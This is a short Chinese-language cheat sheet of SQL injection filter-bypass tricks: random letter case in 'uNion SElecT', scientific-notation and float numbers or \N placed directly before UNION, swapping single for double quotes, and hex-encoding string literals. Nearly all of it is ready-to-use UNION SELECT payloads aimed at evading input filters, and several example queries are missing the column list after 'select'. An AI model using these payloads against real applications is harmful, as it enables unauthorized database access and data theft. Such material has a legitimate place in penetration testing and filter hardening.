大小写:把字符串随机换成大小写 uNion SElecT

    浮点数绕过
    select from users where id=8E0union select 1,2,3,4; //科学计数法,8乘10的0次方
    select     from users where id=8.0union select 1,2,3,4;

    null值绕过
    select \N; 代表 null
    select from users where id=\Nunion select 1,2,3,\N;
    select     from users where id=\Nunion select 1,2,3,\Nfrom users

    引号绕过
    过滤单引号时,试下双引号

    十六进制绕过
    将查询的字符串,转成十六进制(hex) //转换后记得加上“0x”
    select from users where username=’admin’;
    select     from users where username=0x61646D696E;